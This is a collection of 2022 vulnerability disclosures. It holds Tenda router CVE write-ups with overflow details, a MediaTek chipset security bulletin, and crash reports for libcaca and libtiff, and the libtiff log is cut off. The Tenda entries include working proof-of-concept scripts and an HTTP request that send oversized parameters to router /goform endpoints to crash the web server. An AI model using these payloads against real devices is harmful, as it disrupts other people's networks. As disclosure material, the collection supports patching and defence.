Tenda AX1806 v1.0.0.1 was discovered to contain a heap overflow in the function saveParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the urls parameter.

CVE-2022-25557: IoT-CVE/Tenda/AX1806/11 at main · sec-bin/IoT-CVE

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow in the function fromSetSysTime. This vulnerability allows attackers to cause a Denial of Service (DoS) via the ntpServer parameter.

Affect device: Tenda Router AX1806 v1.0.0.1(https://www.tenda.com.cn/download/detail-3306.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the `/goform/SetSysTimeCfg` page which influences the lastest version of Tenda Router AX1806 v1.0.0.1: https://www.tenda.com.cn/download/detail-3306.html

There is a stack overflow vulnerability in the `fromSetSysTime` function.

The `v4` variable is obtained directly from the http request parameter `ntpServer`.

This function uses strcpy to copy the **variable v4 to the stack variable &v33\[16\]** without any sercuity check.

Attacker can construct **a long ntpServer parameter** in the http request,which causes stack overflow.

![image-20220208184212635](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX1806/2/image/1.png)

So attacker can perform **denial of service attacks by causing tdhttpd to crash.**

**POC**

Poc to crash：

import requests

url \= "https://192.168.2.1/goform/SetSysTimeCfg"

ntpserver \= b"a"\*0x10000
timeType \= "sync"
r \= requests.post(url, data\={"timeType" : timeType ,"ntpServer" : ntpserver},verify\=False)
print(r.content)

CVE-2022-25555: IoT-CVE/Tenda/AX1806/2 at main · sec-bin/IoT-CVE

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow in the function fromSetSysTime. This vulnerability allows attackers to cause a Denial of Service (DoS) via the serverName parameter.

Affect device: Tenda Router AX1806 v1.0.0.1(https://www.tenda.com.cn/download/detail-3306.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the `/goform/SetDDNSCfg` page which influences the lastest version of Tenda Router AX1806 v1.0.0.1: https://www.tenda.com.cn/download/detail-3306.html

There is a stack overflow vulnerability in the `formSetSysToolDDNS` function.

The `v3` variable is obtained directly from the http request parameter `serverName`.

This function uses strcpy to copy the **variable v3 to the stack variable s2** without any sercuity check.

![image-20220208222338204](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX1806/5/image/1.png)

So attacker can construct **a long serverName parameter** in the http request,which causes stack overflow.

**POC**

Poc of Denial of Service(DoS):

POST /goform/SetDDNSCfg HTTP/1.1
Host: 192.168.2.1
Connection: close
Accept: text/plain, \*/\*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
X-Requested-With: XMLHttpRequest
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.2.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 2747

serverName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-25548: IoT-CVE/Tenda/AX1806/5 at main · sec-bin/IoT-CVE

Tenda AX12 v22.03.01.21 was discovered to contain a stack overflow in the function sub_42E328. This vulnerability allows attackers to cause a Denial of Service (DoS) via the list parameter.

Affect device: Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the `/goform/SetStaticRouteCfg` page which influences the lastest version of Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

There is a stack overflow vulnerability in the `sub_42E328` function.

First, this function calls the `sub_42E030` function.

![image-20220209190513500](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/6/image/1.png)

In the `sub_42E030` function:

![image-20220209190531902](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/6/image/2.png)

The `v3` variable is obtained directly from the http request parameter `list`.

Then `v3` will be splice to stack by function `sscanf` without any security check, which causes stack overflow.

So by POSTing the page `/goform/SetStaticRouteCfg` with long `list`, the attacker can easily perform a Denial of Service(DoS).

**POC**

Poc of Denial of Service(DoS):

import requests

url \= "http://192.168.0.1/goform/SetStaticRouteCfg"
list\_data \= 'a'\*0x1000 + '~'

r \= requests.post(url, data\={'list': list\_data})
print(r.content)

CVE-2022-25556: IoT-CVE/Tenda/AX12/6 at main · sec-bin/IoT-CVE

Tenda AX12 v22.03.01.21 was discovered to contain a stack overflow in the function sub_42DE00. This vulnerability allows attackers to cause a Denial of Service (DoS) via the list parameter.

Affect device: Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the `/goform/SetVirtualServerCfg` page which influences the lastest version of Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

There is a stack overflow vulnerability in the `sub_42DE00` function.

First, this function calls the `sub_42DB88` function.

![image-20220209184332117](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/5/image/1.png)

In the `sub_42DB88` function:

![image-20220209184425282](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/5/image/2.png)

The `v3` variable is obtained directly from the http request parameter `list`.

Then `v3` will be splice to stack by function `sscanf` without any security check, which causes stack overflow.

So by POSTing the page `/goform/SetVirtualServerCfg` with long `list`, the attacker can easily perform a Denial of Service(DoS).

**POC**

Poc of Denial of Service(DoS):

import requests

url \= "http://192.168.0.1/goform/SetVirtualServerCfg"
list\_data \= 'a'\*0x1000 + '~'

r \= requests.post(url, data\={'list': list\_data})
print(r.content)

CVE-2022-25561: IoT-CVE/Tenda/AX12/5 at main · sec-bin/IoT-CVE

Tenda AX12 v22.03.01.21 was discovered to contain a stack overflow in the function sub_4327CC. This vulnerability allows attackers to cause a Denial of Service (DoS) via the list parameter.

Affect device: Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the `/goform/SetNetControlList` page which influences the lastest version of Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

There is a stack overflow vulnerability in the `sub_4327CC` function.

The `v2` variable is obtained directly from the http request parameter `list`.

And then it calls the `sub_4325BC` function.

![image](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/4/image/1.png)

However, in the `sub_4325BC` function, it calls the strcpy function to a1 to v14 without any security check, which causes the stack overflow.

![image-20220209162909094](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX12/4/image/2.png)

So by POSTing the page `/goform/SetNetControlList` with long `list`, the attacker can easily perform a Denial of Service(DoS).

**POC**

Poc of Denial of Service(DoS):

import requests

url \= "http://192.168.0.1/goform/SetNetControlList"
list\_data \= 'a'\*0x1000 + '\\n'

r \= requests.post(url, data\={'list': list\_data})
print(r.content)

CVE-2022-25560: IoT-CVE/Tenda/AX12/4 at main · sec-bin/IoT-CVE

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function fromSetSysTime. This vulnerability allows attackers to cause a Denial of Service (DoS) via the time parameter.

**Tenda Router AX3 Vulnerability**

This vulnerability lies in the `/goform/SetSysTimeCfg` page which influences the lastest version of Tenda Router AX3. (V16.03.12.10\_CN)

**Vulnerability description**

There is a stack buffer overflow vulnerability in the `fromSetSysTime` function.

The `v9` variable is directly retrieved from the http request parameter `time`.

Then `v9` will be splice to stack by function sscanf without any security check,which causes stack overflow.

![image-20220118220433652](https://github.com/sec-bin/IoT-CVE/raw/main/Tenda/AX3/7/1.png)

So by POSTing the page `/goform/SetSysTimeCfg` with proper `time`, the attacker can easily perform a **Remote Code Execution** with carefully crafted overflow data.

**POC**

import requests
from pwn import \*

url \= "http://192.168.0.1/goform/SetSysTimeCfg"

timeType \= "manual"

time \= "2022-01-01 "
time += "a" \* 1024

r \= requests.post(url, data\={'timeType': timeType, 'time': time})
print(r.content)

**Timeline**

*   2022.01.18 report to CVE & CNVD

CVE-2022-24995: IoT-CVE/Tenda/AX3/7 at main · sec-bin/IoT-CVE

In video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05917489; Issue ID: ALPS05917489.

**March 2022 Product Security Bulletin**

Published 2022-03-07

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and TV chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2022-20047, CVE-2022-20048, CVE-2022-20053

Medium

CVE-2022-20049, CVE-2022-20050, CVE-2022-20051, CVE-2022-20054, CVE-2022-20055, CVE-2022-20056, CVE-2022-20057, CVE-2022-20058, CVE-2022-20059, CVE-2022-20060

****Details****

CVE

**CVE-2022-20047**

Title

Out-of-bounds write in video decoder

Severity

High

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5816, MT5835, MT6885, MT6893, MT9900, MT9901, MT9950, MT9969, MT9970, MT9980

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-20048**

Title

Out-of-bounds write in video decoder

Severity

High

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In video decoder, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5816, MT5835, MT6885, MT6893, MT9900, MT9901, MT9950, MT9969, MT9970, MT9980

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-20053**

Title

Missing authorization in ims service

Severity

High

Vulnerability Type

EoP

CWE

CWE-862 Missing Authorization

Description

In ims service, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6731, MT6732, MT6735, MT6737, MT6739, MT6750, MT6750S, MT6752, MT6753, MT6755, MT6755S, MT6757, MT6758, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6795, MT6797, MT6799, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8167, MT8168, MT8173, MT8183, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8666, MT8667, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 9.0, 10.0, 11.0, 12.0

CVE

**CVE-2022-20049**

Title

Improper access control in vpu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-284 Improper Access Control

Description

In vpu, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6779, MT6785, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT8168, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8788

Affected Software Versions

Android 10.0, 11.0

CVE

**CVE-2022-20050**

Title

Unix symbolic link (symlink) following in connsyslogger

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-61 UNIX Symbolic Link (Symlink) Following

Description

In connsyslogger, there is a possible symbolic link following due to improper link resolution. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6762, MT6765, MT6768, MT6769, MT6779, MT6781, MT6785, MT6795, MT6797, MT6799, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6880, MT6883, MT6885, MT6889, MT6891, MT6893, MT8163, MT8167, MT8167S, MT8168, MT8173, MT8175, MT8183, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8666, MT8667, MT8675, MT8696, MT8735A, MT8735B, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-20051**

Title

Incorrect privilege assignment in ims service

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-266 Incorrect Privilege Assignment

Description

In ims service, there is a possible unexpected application behavior due to incorrect privilege assignment. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6731, MT6732, MT6735, MT6737, MT6739, MT6750, MT6750S, MT6752, MT6753, MT6755, MT6755S, MT6757, MT6757C, MT6757CD, MT6757CH, MT6758, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6795, MT6797, MT6799, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6880, MT6883, MT6885, MT6889, MT6890, MT6891, MT6893, MT8167, MT8168, MT8173, MT8183, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8666, MT8667, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-20054**

Title

Missing authorization in ims service

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-862 Missing Authorization

Description

In ims service, there is a possible AT command injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6739, MT6750, MT6761, MT6762, MT6763, MT6765, MT6768, MT6771, MT6779, MT8167, MT8168, MT8173, MT8183, MT8185, MT8321, MT8362A, MT8365, MT8385, MT8666, MT8667, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 9.0, 10.0, 11.0, 12.0

CVE

**CVE-2022-20055**

Title

Out-of-bounds write in preloader (usb)

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In preloader (usb), there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, for an attacker who has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6885, MT6893, MT8183, MT8185, MT8321, MT8385, MT8666, MT8667, MT8675, MT8735A, MT8735B, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-20056**

Title

Out-of-bounds write in preloader (usb)

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In preloader (usb), there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, for an attacker who has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6885, MT6893, MT8183, MT8185, MT8321, MT8385, MT8666, MT8667, MT8675, MT8735A, MT8735B, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-20057**

Title

Detection of error condition without action in btif

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-390 Detection of Error Condition Without Action

Description

In btif, there is a possible memory corruption due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation.

Affected Chipsets

MT6739, MT6758, MT6761, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6883, MT6893, MT8163, MT8167, MT8168, MT8173, MT8362A, MT8365

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-20058**

Title

Out-of-bounds write in preloader (usb)

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In preloader (usb), there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, for an attacker who has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6877, MT6885, MT6893, MT8183, MT8185, MT8321, MT8385, MT8666, MT8667, MT8675, MT8735A, MT8735B, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-20059**

Title

Out-of-bounds write in preloader (usb)

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In preloader (usb), there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, for an attacker who has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6885, MT6889, MT6893, MT8183, MT8185, MT8321, MT8385, MT8666, MT8667, MT8675, MT8735A, MT8735B, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 10.0, 11.0, 12.0

CVE

**CVE-2022-20060**

Title

Security flow issues in preloader (usb)

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-1196 Security Flow Issues

Description

In preloader (usb), there is a possible permission bypass due to a missing proper image authentication. This could lead to local escalation of privilege, for an attacker who has physical access to the device, with no additional execution privileges needed. User interaction is needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6873, MT6875, MT6877, MT6885, MT6889, MT6893, MT8183, MT8185, MT8321, MT8385, MT8666, MT8667, MT8675, MT8735A, MT8735B, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 10.0, 11.0, 12.0

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

March 7, 2022

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2022-20047: March 2022

libcaca is affected by a Divide By Zero issue via img2txt, which allows a remote malicious user to cause a Denial of Service

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

kdsjZh opened this issue

Feb 24, 2022

· 3 comments

Open

**\[BUG\] Divide by zero in img2txt #65**

kdsjZh opened this issue

Feb 24, 2022

· 3 comments

**Comments**

version: latest commit f42aa68  
driver: src/img2txt  
Environment: ubuntu 22.04, clang-12  
step to reproduce:

    export CFLAGS="-fsanitize=address -g"
    export CC=clang
    ./bootstrap
    ./configure 
    make -j8
    ./src/img2txt ./divide_by_0.seed
    

Sanitizer output:

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25214==ERROR: AddressSanitizer: FPE on unknown address 0x0000004d0433 (pc 0x0000004d0433 bp 0x7fff1cb39010 sp 0x7fff1cb38ee0 T0)
        #0 0x4d0433 in main /benchmarks/libcaca/src/img2txt.c:183:42
        #1 0x7fa2270f9d8f  (/lib/x86_64-linux-gnu/libc.so.6+0x2dd8f)
        #2 0x7fa2270f9e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2de3f)
        #3 0x421944 in _start (/benchmarks/libcaca/src/img2txt+0x421944)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /benchmarks/libcaca/src/img2txt.c:183:42 in main
    ==25214==ABORTING
    
    

#POC  
divide\_by\_0.zip

##Credit  
Han Zheng  
NCNIPC of China  
Hexhive

Thank you, reading the code it could happen when given a valid image of width 0 (probably the case here), but also with any image if passing -y 0.

How's this going to be fixed?  
I added a check for i->w and/or i->h being 0, issuing an error message ("image size is 0") and setting lines and cols to 0 (caca_set_canvas_size can handle this).  
Obviously caca_export_canvas_to_memory then chokes on this but this is handled already. I only then also changed the format in the error message to format?format:"ansi".

CVE-2022-0856: [BUG] Divide by zero in img2txt · Issue #65 · cacalabs/libcaca

Reachable Assertion in tiffcp in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 5e180045.

Skip to content

Open Issue created Feb 24, 2022 by **4ugustus@waugustus**Contributor

**tiffcp: Assertion failed in TIFFReadAndRealloc, tif\_read.c:99**

Summary

There is a reachable assertion-failed crash in \_TIFFReadAndRealloc, tif\_read.c:99. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted tiff file. **Note that this crash is different from #377 (closed)**

Version

573e0252 (Sun Feb 20 14:47:49 2022 +0100)

Steps to reproduce

    $ tiffcp poc /tmp/foo
    
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 65535 (0xffff) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 65046 (0xfe16) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 53693 (0xd1bd) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 2449 (0x991) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 52970 (0xceea) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3 (0x3) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 1 (0x1) encountered.
    TIFFFetchNormalTag: Warning, ASCII value for tag "Model" does not end in null byte.
    TIFFFetchNormalTag: Warning, Incorrect count for "FillOrder"; tag ignored.
    TIFFFetchNormalTag: Warning, ASCII value for tag "DocumentName" contains null byte in value; value incorrectly truncated during reading due to implementation limitations.
    TIFFFetchNormalTag: Warning, ASCII value for tag "Tag 65046" does not end in null byte. Forcing it to be null.
    TIFFFetchNormalTag: Warning, Incorrect count for "XResolution"; tag ignored.
    Fax4Decode: Warning, Line length mismatch at line 1 of strip 0 (got 60704, expected 60703).
    Fax4Decode: Warning, Line length mismatch at line 3 of strip 0 (got 60704, expected 60703).
    Fax4Decode: Bad code word at line 6 of strip 0 (x 6).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 6, expected 60703).
    Fax4Decode: Bad code word at line 6 of strip 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 0, expected 60703).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 8, expected 60703).
    Fax4Decode: Uncompressed data (not supported) at line 6 of strip 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 0, expected 60703).
    Fax4Decode: Uncompressed data (not supported) at line 6 of strip 0 (x 60700).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 60700, expected 60703).
    Fax4Decode: Uncompressed data (not supported) at line 6 of strip 0 (x 60700).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 60700, expected 60703).
    Fax4Decode: Warning, Line length mismatch at line 6 of strip 0 (got 60704, expected 60703).
    Fax4Decode: Warning, Premature EOF at line 6 of strip 0 (x 54).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 54, expected 60703).
    Fax4Decode: Warning, Premature EOF at line 6 of strip 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 0, expected 60703).
    Fax4Decode: Warning, Premature EOF at line 6 of strip 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 0, expected 60703).
    Fax4Decode: Warning, Premature EOF at line 6 of strip 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 0, expected 60703).
    Fax4Decode: Warning, Premature EOF at line 6 of strip 0 (x 0).
    Fax4Decode: Warning, Premature EOL at line 6 of strip 0 (got 0, expected 60703).
